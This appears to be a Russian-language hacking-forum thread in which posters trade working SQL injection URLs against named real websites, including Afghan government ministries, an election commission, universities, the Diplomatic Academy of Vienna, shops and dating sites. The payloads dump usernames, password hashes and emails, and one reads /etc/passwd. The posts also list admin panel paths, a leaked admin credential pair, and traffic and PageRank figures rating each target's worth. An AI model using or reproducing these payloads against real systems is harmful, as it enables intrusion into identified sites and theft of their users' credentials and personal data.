SQL Инъекции

_http://www.moph.gov.af/en/events.php?id=21+and+1=0+UnIoN/**/SeLeCt+1,2,3,group_concat(id,0x3a,uname,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12+from+registered_members

Ministry of Public Health Afghanistan
---------
http://www.iec.org.af/eng/content.php?id=4+or+(1,1)=(select+count(0),concat((select+concat(username,char(58),hash_password)+from+users+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

Independent Election Commission of Afghanistan
---------
http://www.nbaa.com.af/file.php?id=6+and+1=0+union+select+1,2,3,4,aes_decrypt(aes_encrypt(group_concat(username,char(58),password),1),1),6+from+websiteadmin_admin_users

National Basketball Association of Afghanistan
---------

http://www.misfa.org.af/file.php?id=122+and+1=0+union+select+1,2,3,4,aes_decrypt(aes_encrypt(user_pwd,1),1),6+from+users+where+user_name=char(119,97,100,111,111,100)

Microfinance Investment Support Facility for Afghanistan

 

PR 4

195.8.80.50
blunt
5.0.77-log
unknown-linux-gnu

http://www.bluntlondon.com/work.php?id=201+and+1=0+%20Union%20Select%20%20CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,2

---------------------------------------

PR 3

stratisa_stratis@localhost
stratisa_stratisdb
4.1.22-standard
pc-linux-gnu

http://www.stratisautosport.gr/en/products/car.php?id=43+and+1=0+UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29,@@version_compile_os%20%29,3,4,5

 

http://collections.glasgowmuseums.com/cld.html?cid=533619%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20 --

5.0.51b-community-nt

 

http://www.ries.com/iframes/articles-read.php?id=55'+and+1=0+union+select+1,2,3,4,5,6,group_concat(table_name),8+from+information_schema.tables+where+table_schema=database()+--+

ТИЦ : 30

http://www.4apes.com/science/read.php?id=613'+and+1=0+union+select+1,2,3,concat_ws(0x3a,id,loginname,password,email),5,6,7,8,9+from+phplist_admin+limit+0,1+--+

Code:

http://www.4apes.com/lists/admin/ - Админка проекта

ТИЦ : 10

 

http://www.greyhenpress.com/news.php?id=-4'%20union%20select%201,2,group_concat(table_name,0x3a,table_rows),4,5,6%20from%20information_schema.tables--%201

http://www.montreuxjazz.com/news.php?id=-37%20union%20select%201,2,3,unhex(hex(table_name)),5,6,7,8,9,10,11,12,13,14%20from%20information_schema.tables%20limit%2017,1--%201

 

http://www.mba.ru/studentsworks.php?id=-6+union+select+1,2,concat_ws(0x3a,manager_name,adv_password),4,5,6+from+mbs.mbs_managers--
тиц 300 пр5

 

http://www.shareapic.net/content.php?gid=187428.8%27union%20select%201,2,group_concat%280x3c62723e,login,0x3a3a,password,0x3a3a,email,0x3a3a,usertype%29,4,5,6,7,8%20from%20shareapic.users%20where%20login%20like%200x2561646d696e25--%20

мб кому интересно будет)

100к+ трафа)


http://www.thedailystar.net/latest/updates.php?pid=-1%0Aunion%0Aall%0Aselect%0A1,2,3,4,5/*


тож трафистое)...юзеров сами дернете если кому интересно

 

ДЕЛОВОЙ ВЕСТНИК

http://www.volgogradcci.ru/udv/index.php?loc=1&id=-135+and+1=2+union+select+concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),2+--


5.0.19-log root@localhost udv pc-linux-gnu

 

http://www.wandatech.com/Products.php?pid=84+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x3a,id,lastname,password)+from+cc_members+limit+0,1),1,64),floor(rand(0)*2)))

Какой-то шоп с зонтиками
вывод phpinfo() - http://www.wandatech.com/v.php

http://www.szczecinek.lasy.gov.pl/goscino/aktualnosci.php?numer=1347&id=41+UnIon+selECt+1,2,3,4,concat(Login,char(58),Haslo),6,7,8,9,10+from+UZYTKOWNICY+--+

Админка - administracja/login.php

 

Датинг?!

http://www.adultfyi.com/read.php?ID=999999+union+select+1,concat_ws(0x3a,version(),user()%20,database(),@@version_compile_os),3,4,5,6,7,8--

http://www.siberianbrides.com/show_anketa_lady.php?id=99999+union+select+concat_ws(0x3a,version(),user()%20,database(),@@version_compile_os),2,3,4,5,6,7--

 

http://www.capitansilver.ru/?id=-4+union+select+1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--

4.0.27-log [email protected] silver2 pc-linux-gnu

http://www.capitansilver.ru/?id=-4+union+select+1,2,concat_ws(0x3a,login,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user+limit+0,1--

 

http://www.greennavigation.com/news/news_profile.php?id=-33+union+select+0,1,2,3,concat(username,0x3a,p ass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+login

PR 4

http://www.jitreshippables.com/news1.php?id=-5+union+select+1,concat(username,0x3a,p ass word,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users

PR 3

http://www.hopeevanmin.org/calendar/eventdisplay.php?id=-13%20union%20select%201,2,concat(username,0x3a,p ass word)%20from%20admin

PR 2

http://www.adoradoll.us/news_detail.php?ID=44+union+select+0,concat(UserName,0x3a,P ass Word),2,3,4,5,6,7,8,9,10,11+from+DownUser

PR 3

http://mycjonline.com/articlesdetails.php?id=-21%20%20union%20select%20concat(username,0x3a,p ass word),2,3%20from%20users

PR 3

http://www.lapine-fsbo.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(username,0x3a,p ass word),1,1,1,1,1,1,2,2,2,2,2/**/from/*%20*/admin--

PR 2

http://nekar.gr/index.php?id=-1%20union%20select%200,concat(username,0x3a,p ass word,0x3a,email),2,0x65786569207369676f75726120736f6261726f2070726f626c686d6120682053514c20746f75207369746521,4,5,6,7,8,9,10,11%20from%20admins--

PR 4

http://www.discoveryland.cn/index.php?c=article&a=view&artid=104%20and%201=2%20union%20all%20select%201,2,3,concat(username,0x3a,password),5,6,7,8,9,10%20from%20dland_admin%20limit%200,1--

PR 5

http://www.citme.com.cn/news.php?id=-57+union+select+0,concat_ws(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+Tb_Admin

PR 5 Cy 10

http://toeic-vietnam.com/info/details.php?id=null%20union%20select%201,2,group_concat(username,0x3a,password),4,5,6,7%20from%20users

PR 4

http://www.futurape.com/vedi-news.php?id=7+AND+1=2+UNION+SELECT+1,2,group_concat(Username,0x3a,Password),4,5,6,7,8,9+FROM+Utente

PR 3

http://www.shangproperties.com/news_archive.php?id=-6%20union%20select%201,%202,%203,%204,%205,6,%207,group_concat(Username,0x3a,Password),%209,%2010,%2011,%2012,%2013,%2014+from+auth_user_md5--

PR 3

http://www.hiast.edu.vn/index.php?pg=tintuc&task=chitiet&p2=52&p3=-129+Union+Select+1,2,3,group_concat(username,0x3a,password,0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+bee_admin--&lang=en

PR 3

http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=-335+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0x3a,password,0x3a,name,0x3a,email,0x3a,phone,0x3a,status,0x3a,createdby,0x3a,created,0x3a,updated,0x3a,lastlogin),7,8,9+from+cms_users+--

PR 3

http://www.smkn2bukittinggi.com/detail.php?id=-3%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12%20from%20user

PR 4

http://nkutr.nku.edu.tr/haberdetay.php?id=-1111'UNioN%20SeLeCt%201,GRouP_ConCaT(username,0x3a,password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20mmyo_users--+

PR 7 Cy 10

http://www.coursupreme.dz/index.php?p=affichedecision&id=-669%20union%20select%201,2,3,4,5,6,load_file('/etc/passwd'),8+from+mysql.user
Наглядный пример читалки файлов через скулю
PR 5

 

http://eyeworld.mobi/current-issue-article.php?id=5621%20and%20substring(version(),1,1)=3

3-я ветка =\

http://www.cadtutor.mobi/links/includes/jump.php?id=2%20and%20ascii(lower(substring((select version()),1,1)))>1

 

http://www.ulbsibiu.ro/ro/stiri/news.php?print=true&news_id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,(SELECT%20concat(0x7e,0x27,Hex(cast(jos_users.password%20as%20char)),0x27,0x7e)%20FROM%20cat_sociologie.jos_users%20LIMIT%200,1)%20,28,29,30,31,32,33,34,35,36,37,38--

PR 8 Cy 30

 

Diplomatic Academy of Vienna (Вена)

Code:

http://www.da-vienna.at/jart/prj3/diplomatische_akademie/main.jart?rel=en&reserve-mode=active&content-id=1268305958599&artikel_id=-4283+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,0x3a,0x3a,username,0x3a,0x3a,password,0x3a,0x3a,anrede,0x3a,0x3a,realvname,0x3a,0x3a,realnname,0x3a,0x3a,land,0x3a,0x3a,ort,0x3a,0x3a,plz,0x3a,0x3a,strasse,0x3a,0x3a,email,0x3a,0x3a,gebdat,0x3a,0x3a,0x3a),11,12,13,14,15,16,17+from+diplak.wuser_user--

PR — 7

 

http://www.use.or.ug/copindex.php?cat=lstofallco&subcat=lstcodir&cop=84+and+1=0+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--

http://www.umi.ac.ug/courses2.php?course_id=73+or+1+group+by+concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))having+min(0)+or+1--

 

У меня дебют в данной теме Надеюсь буду хоть кому то полезен

filmworld.com.ua
admin:filmworldadmin
PR: 0 ТИЦ: 0
Database Version: 5.0.91-community-log
Database name: filmworl_film
User name: filmworl@localhost
OC type: unknown-linux-gnu​

Code:

http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+unhex(hex(version()))--

Code:

http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+login+from+customer+limit+0,1--

Code:

http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+password+from+customer+limit+0,1--

vmo.rgub.ru
PR: 6 ТИЦ: 60
Database Version: 5.1.37-1ubuntu5.4
Database name: vmo_db01
User name: root@localhost
OC type: debian-linux-gnu
FILE_PRIV: Y
Magic quotes = off​

Code:

http://vmo.rgub.ru/policy/article.php?id=214+and+1=0+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12--

Code:

http://vmo.rgub.ru/policy/article.php?id=214+and+1=0+union+select+1,login,3,4,5,6,password,8,9,10,11,12+from+users+limit+0,1--

mirpodarkov.in.ua
PR: 2 ТИЦ: 0
Database Version: 5.0.91
Database name: wildcat_mir
User name: wildcat@localhost
OC type: redhat-linux-gnu ​

Code:

http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(version())),11--

Code:

http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,user_group,11+from+dle_users+limit+0,1-- 

Code:

 http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,password,11+from+dle_users+limit+0,1--

Code:

 http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,username,11+from+dle_users+limit+0,1--

Code:

http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,email,11+from+dle_users+limit+0,1-- 

Code:

http://mirpodarkov.in.ua/admin.php

 

http://www.oxothik.ru/index.php?action=news&id=-99+union+all+select+1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7--

5.0.26-lk-log ecliptru_tour@localhost ecliptru_tour pc-linux-gnu